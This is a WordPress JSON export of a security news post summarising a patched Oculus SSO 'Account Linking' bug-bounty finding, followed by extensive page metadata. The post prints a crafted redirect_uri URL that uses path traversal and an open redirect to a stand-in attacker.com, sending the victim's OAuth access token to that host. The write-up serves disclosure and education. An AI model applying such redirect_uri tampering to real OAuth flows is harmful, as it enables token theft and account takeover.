{"id":4624,"date":"2024-06-21T07:08:36","date_gmt":"2024-06-21T07:08:36","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=4624"},"modified":"2024-06-30T14:30:37","modified_gmt":"2024-06-30T14:30:37","slug":"facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","title":{"rendered":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover"},"content":{"rendered":"<h3>Oculus Account Takeover: Oculus SSO &#8220;Account Linking&#8221; Bug Exposes Users to Account Takeover<\/h3>\n<p><strong>Oculus Account Takeover<\/strong> &#8211; A critical security vulnerability in Oculus&#8217;s &#8220;Account Linking&#8221; feature, discovered by bug hunter <a href=\"https:\/\/www.google.com\/search?q=Youssef\">Youssef<\/a> Sammouda, has put users at risk of account takeover on third-party websites and VR games\/apps.
The bug, reported on February 26, 2021, was acknowledged by Facebook on March 2, 2021, and fixed on March 16, 2021.<\/p>\n<p>The <a href=\"https:\/\/secry.me\/explore\/category\/news\/\">vulnerability<\/a> allowed attackers to manipulate the callback endpoint, redirecting the Oculus access token to their own website, potentially leading to account takeover. This was possible because the value of the <em><strong>redirect_uri<\/strong><\/em> parameter was not matched exactly against the organization&#8217;s SSO settings, and because characters were inadequately filtered.<\/p>\n<p>To exploit this bug, an attacker could modify the redirect_uri parameter, for example, from:<\/p>\n<p><em>https:\/\/auth.oculus.com\/sso\/?redirect_uri=https:\/\/forums.oculusvr.com\/hucou38897\/plugins\/custom\/facebook\/fboculus\/custom.oauthsso-redirect&amp;organization_id=695304644729285<\/em><\/p>\n<p>to:<\/p>\n<p><em>https:\/\/auth.oculus.com\/sso\/?redirect_uri=https:\/\/forums.oculusvr.com\/hucou38897\/plugins\/custom\/facebook\/fboculus\/custom.oauthsso-redirect\/..\/..\/..\/..\/..\/..\/open_redirect?next=https:\/\/www.attacker.com&amp;organization_id=695304644729285<\/em><\/p>\n<p>The access token would then be sent to the attacker&#8217;s website, allowing them to log in to the user&#8217;s Oculus account and potentially access other linked accounts in VR games and apps.<\/p>\n<p>Sammouda notes that this type of bug is common in OAuth authentication flows and emphasizes the importance of checking for small and common issues before looking for complex ones. Facebook has since fixed the issue and awarded Sammouda a <strong>$12000<\/strong> bounty, including a bonus, for his discovery.<\/p>\n<p>This incident highlights the importance of thorough security testing and responsible disclosure in ensuring the safety and security of users&#8217; accounts.
By working together with security researchers like Sammouda, companies can identify and address vulnerabilities before they can be exploited by malicious actors.<\/p>\n<p>&nbsp;<\/p>\n<div class=\"x1e56ztr\"><strong><span class=\"x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs xt0psk2 xt4736n x1havqas x1f0sm9e x12qp5cl xzsf02u x1yc453h\">&#8211;Meta bug bounty program<\/span><\/strong><\/div>\n<p>&nbsp;<\/p>\n<p><strong>Link to read full write up: <\/strong>https:\/\/ysamm.com\/?p=697<\/p>\n<p><strong>Save the PDF<\/strong>\u00a0<a href=\"https:\/\/secry.me\/explore\/pdf-story\/TAKE%20OVER\/Oculus%20SSO%20%E2%80%9CAccount%20Linking%E2%80%9D%20bug%20leads%20to%20account%20takeover%20on%20third%20party%20websites%20and%20inside%20VR%20Games_Apps%20%E2%80%93%20Youssef%20Sammouda.pdf\"><em>here<\/em><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Oculus Account Takeover: Oculus SSO &#8220;Account Linking&#8221; Bug Exposes Users to Account Takeover Oculus Account Takeover &#8211; A critical security vulnerability in Oculus&#8217;s &#8220;Account Linking&#8221; feature,
discovered by bug hunter Youssef Sammouda, has put users at risk of account takeover on third-party websites and VR games\/apps. The bug, reported on February 26, 2021, was acknowledged [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4633,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107,136,461,106],"tags":[13,117,451,447,450,448],"class_list":["post-4624","post","type-post","status-publish","format-standard","has-post-thumbnail","category-account-takeover","category-bug-bounty","category-meta-bug-bounty","category-takeover","tag-bug-bounty","tag-facebook","tag-facebook-bug-bounty","tag-meta-bug-bounty","tag-meta-bug-bounty-program","tag-meta-bug-bounty-write-up"],"yoast_head_json":{"title":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY","description":"Oculus Account Takeover: Oculus SSO \"Account Linking\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability in","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","og_locale":"en_US","og_type":"article","og_title":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY","og_description":"Oculus Account Takeover: Oculus SSO \"Account Linking\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability
in","og_url":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2024-06-21T07:08:36+00:00","article_modified_time":"2024-06-30T14:30:37+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","type":"image\/png"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/dbec053e2c1eab18214cc9769e329da0"},"headline":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover","datePublished":"2024-06-21T07:08:36+00:00","dateModified":"2024-06-30T14:30:37+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/"},"wordCount":331,"commentCount":0,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","keywords":["Bug Bounty","Facebook","Facebook Bug Bounty","Meta Bug Bounty","Meta Bug Bounty Program","Meta Bug Bounty Write Up"],"articleSection":["Account Takeover","Bug Bounty","Meta Bug 
Bounty","Takeover"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","url":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/","name":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover | SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","datePublished":"2024-06-21T07:08:36+00:00","dateModified":"2024-06-30T14:30:37+00:00","description":"Oculus Account Takeover: Oculus SSO \"Account Linking\" Bug Exposes Users to Account Takeover Oculus Account Takeover - A critical security vulnerability 
in","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2024\/06\/Oculus-SSO-Account-Linking-Account-Takeover.png","width":1280,"height":720,"caption":"Meta Oculus Account Takeover via Account Linking Feature"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/facebook-oculus-sso-bug-how-a-simple-manipulation-led-to-account-takeover\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Facebook Oculus SSO Bug: How a Simple Manipulation Led to Account Takeover"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story 
Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/dbec053e2c1eab18214cc9769e329da0","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. 
Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=4624"}],"version-history":[{"count":10,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4624\/revisions"}],"predecessor-version":[{"id":4668,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/4624\/revisions\/4668"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/4633"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=4624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=4624"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=4624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}